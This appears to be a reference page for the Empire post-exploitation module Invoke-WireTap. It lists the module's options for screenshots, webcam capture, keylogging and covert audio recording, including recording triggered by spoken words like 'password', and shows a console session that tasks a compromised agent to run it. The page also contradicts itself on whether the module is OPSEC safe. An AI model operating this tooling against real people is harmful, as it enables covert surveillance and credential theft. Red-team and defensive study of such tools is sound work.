Invoke-WireTap - Empire Module


This page contains detailed information about how to use the powershell/collection/WireTap Empire module. For a list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-WireTap
Module: powershell/collection/WireTap
Source code [1]: empire/server/modules/powershell/collection/WireTap.yaml
Source code [2]: empire/server/modules/powershell/collection/WireTap.py
MITRE ATT&CK: T1123, T1125, T1056
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No

WireTap is a .NET 4.0 project to consolidate several functions used to interact with a user's hardware, including: Screenshots (Display + WebCam Imaging), Audio (Both line-in and line-out), Keylogging, & Activate voice recording when the user says a keyword phrase. Note: Only one method can be run at a time.

This module runs in the foreground and is OPSEC unsafe, as it writes to disk and could therefore be detected by AV/EDR running on the target system (the module's own metadata nevertheless lists OpsecSafe as True).

Note that the WireTap module does not need administrative privileges to work properly, which means that a normal user can run it.

Required Module Options


This is a list of options that are required by the WireTap module:

Agent
Agent to run on.

Additional Module Options


This is a list of additional options that are supported by the WireTap module:

capture_screen
Screenshot the current user's screen.

capture_webcam
Capture images from the user's attached webcam (if it exists).

keylogger
Begin logging keystrokes to a file.

listen_for_passwords
Listens for words 'username', 'password', 'login' and 'credential', and when heard, starts an audio recording for two minutes.

record_audio
Record audio from both the microphone and the speakers. Default: 10s.

record_mic
Record audio from the attached microphone (line-in).
Default value: True.

record_sys
Record audio from the system speakers (line-out).

time
Time to record mic, sys, or audio. Time suffix can be s/m/h.
Default value: 10s.

WireTap Example Usage


Here's an example of how to use the WireTap module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/WireTap

 Author       @mDoi12mdjf                                                            
              @S3cur3Th1sSh1t                                                        
 Background   False                                                                  
 Comments     https://github.com/djhohnstein/WireTap                                 
 Description  WireTap is a .NET 4.0 project to consolidate several functions used to 
              interact with a user's hardware, including: Screenshots (Display +     
              WebCam Imaging), Audio (Both line-in and line-out), Keylogging, &      
              Activate voice recording when the user says a keyword phrase. Note:    
              Only one method can be ran at a time.                                  
 Language     powershell                                                             
 Name         powershell/collection/WireTap                                          
 NeedsAdmin   False                                                                  
 OpsecSafe    True                                                                   
 Techniques   http://attack.mitre.org/techniques/T1123                               
              http://attack.mitre.org/techniques/T1125                               
              http://attack.mitre.org/techniques/T1056                               


,Record Options--------,-------,----------,-------------------------------------,
| Name                 | Value | Required | Description                         |
|----------------------|-------|----------|-------------------------------------|
| Agent                |       | True     | Agent to run on.                    |
|----------------------|-------|----------|-------------------------------------|
| capture_screen       |       | False    | Screenshot the current user's       |
|                      |       |          | screen.                             |
|----------------------|-------|----------|-------------------------------------|
| capture_webcam       |       | False    | Capture images from the user's      |
|                      |       |          | attached webcam (if it exists).     |
|----------------------|-------|----------|-------------------------------------|
| keylogger            |       | False    | Begin logging keystrokes to a file. |
|----------------------|-------|----------|-------------------------------------|
| listen_for_passwords |       | False    | Listens for words 'username',       |
|                      |       |          | 'password', 'login' and             |
|                      |       |          | 'credential', and when heard,       |
|                      |       |          | starts an audio recording for two   |
|                      |       |          | minutes.                            |
|----------------------|-------|----------|-------------------------------------|
| record_audio         |       | False    | Record audio from both the          |
|                      |       |          | microphone and the speakers.        |
|                      |       |          | Default: 10s                        |
|----------------------|-------|----------|-------------------------------------|
| record_mic           | True  | False    | Record audio from the attached      |
|                      |       |          | microphone (line-in).               |
|----------------------|-------|----------|-------------------------------------|
| record_sys           |       | False    | Record audio from the system        |
|                      |       |          | speakers (line-out).                |
|----------------------|-------|----------|-------------------------------------|
| time                 | 10s   | False    | Time to record mic, sys, or audio.  |
|                      |       |          | Time suffix can be s/m/h.           |
'----------------------'-------'----------'-------------------------------------'

(Empire: usemodule/powershell/collection/WireTap) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/WireTap) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come back.

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.